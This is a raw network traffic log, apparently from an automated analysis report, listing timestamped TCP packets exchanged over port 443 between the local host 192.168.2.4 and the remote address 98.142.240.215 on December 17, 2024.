                                                                                                                                                                              Dec 17, 2024 18:12:27.524517059 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.527148008 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.527219057 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.527229071 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.527268887 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.530742884 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.530925035 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.530950069 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.531011105 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.533808947 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.533895969 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.533902884 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.533945084 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.537575960 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.537671089 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.537674904 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.537720919 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.540781975 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.540887117 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.540890932 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.541111946 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.543788910 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.543883085 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.543894053 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.543945074 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.685903072 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.686058998 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.686089039 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.686161041 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.688721895 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.688826084 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.688832998 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.688884020 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.692500114 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.692708969 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.692734003 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.692783117 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.695774078 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.695866108 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.695871115 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.695916891 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.698812962 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.698930025 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.698935032 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.698986053 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.702543974 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.702651978 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.702656984 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.702694893 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.705801964 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.705903053 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.705907106 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.705950975 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.708798885 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.708878994 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.708884001 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.708929062 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.712605000 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.712779045 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.712784052 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.712902069 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.715956926 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.716053009 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.716058016 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.716100931 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.719729900 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.719813108 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.719818115 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.719862938 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.722731113 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.722805023 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.722815990 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.722871065 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.726289034 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.726402998 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.726422071 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.726492882 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.729520082 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.729644060 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.729655027 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.729743004 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.732814074 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.732937098 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.732949018 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.733027935 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.736434937 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.736567974 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.736577988 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.736634970 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.892055035 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.892287970 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.892328024 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.892406940 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.894944906 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.895071983 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.895087957 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.895159006 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.898493052 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.898565054 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.898571014 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.898638964 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.901510000 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.901602030 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.901607037 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.901659012 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.904716969 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.904870033 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.904875040 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.904931068 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.908613920 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.908704042 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.908709049 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.908756971 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.911927938 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.912008047 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.912014008 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.912096977 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.916138887 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.916220903 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.916227102 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.916274071 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.917608023 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.917680025 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.917685032 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.917726040 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.920866013 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.920950890 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.920974016 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.921046972 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.925668001 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.925754070 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.925765038 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.925822973 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.928453922 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.928524971 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.928536892 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.928586960 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.932533979 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.932624102 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.932635069 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.932688951 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.935833931 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.935914993 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.935926914 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.935997009 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.938724041 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.938798904 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.938810110 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.938859940 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.942683935 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.942764997 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.942775965 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.942831039 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.082859993 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.082956076 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.082978010 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.083084106 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.085670948 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.085772038 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.085777044 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.085818052 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.089545965 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.089627981 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.089632988 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.089674950 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.093787909 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.093997002 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.094022989 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.094085932 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.097171068 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.097250938 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.097258091 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.097323895 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.100831032 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.100910902 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.100918055 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.100960016 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.103715897 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.103809118 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.103813887 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.103854895 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.107070923 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.107163906 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.107170105 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.107214928 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.110910892 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.110985994 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.110992908 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.111031055 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.114262104 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.114326000 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.114331961 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.114383936 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.117652893 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.117732048 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.117737055 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.117793083 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.120873928 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.120970011 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.120975018 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.121020079 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.124516964 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.124593019 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.124598026 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.124639988 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.127547979 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.127639055 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.127644062 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.127686977 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.130256891 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.130371094 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.130376101 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.130425930 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.134676933 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.134756088 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.134767056 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.134809017 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.275286913 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.275409937 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.275446892 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.275515079 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.278501034 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.278590918 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.278598070 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.278641939 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.281905890 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.281989098 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.282002926 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.282052994 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.284799099 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.284874916 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.284888029 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.284936905 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.288650990 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.288731098 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.288744926 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.288817883 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.292813063 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.292886019 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.292901039 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.292953014 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.295753002 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.295816898 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.295830011 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.295876980 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.298698902 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.298782110 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.298795938 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.298849106 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.302059889 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.302144051 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.302155972 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.302207947 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.305835962 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.305907965 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.305919886 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.305973053 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.308602095 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.308679104 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.308690071 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.308736086 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.312391043 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.312464952 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.312478065 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.312552929 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.315527916 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.315618992 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.315630913 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.315685987 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.319420099 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.319492102 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.319504976 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.319556952 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.324620962 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.324717999 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.324732065 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.324779034 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.328099012 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.328165054 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.328177929 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.328275919 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.475709915 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.475843906 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.475887060 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.475970030 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.478718996 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.478823900 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.478831053 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.478879929 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.481817007 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.481919050 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.481930971 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.481993914 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.485605955 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.485698938 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:28.485711098 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:28.485769033 CET49731443192.168.2.498.142.240.215
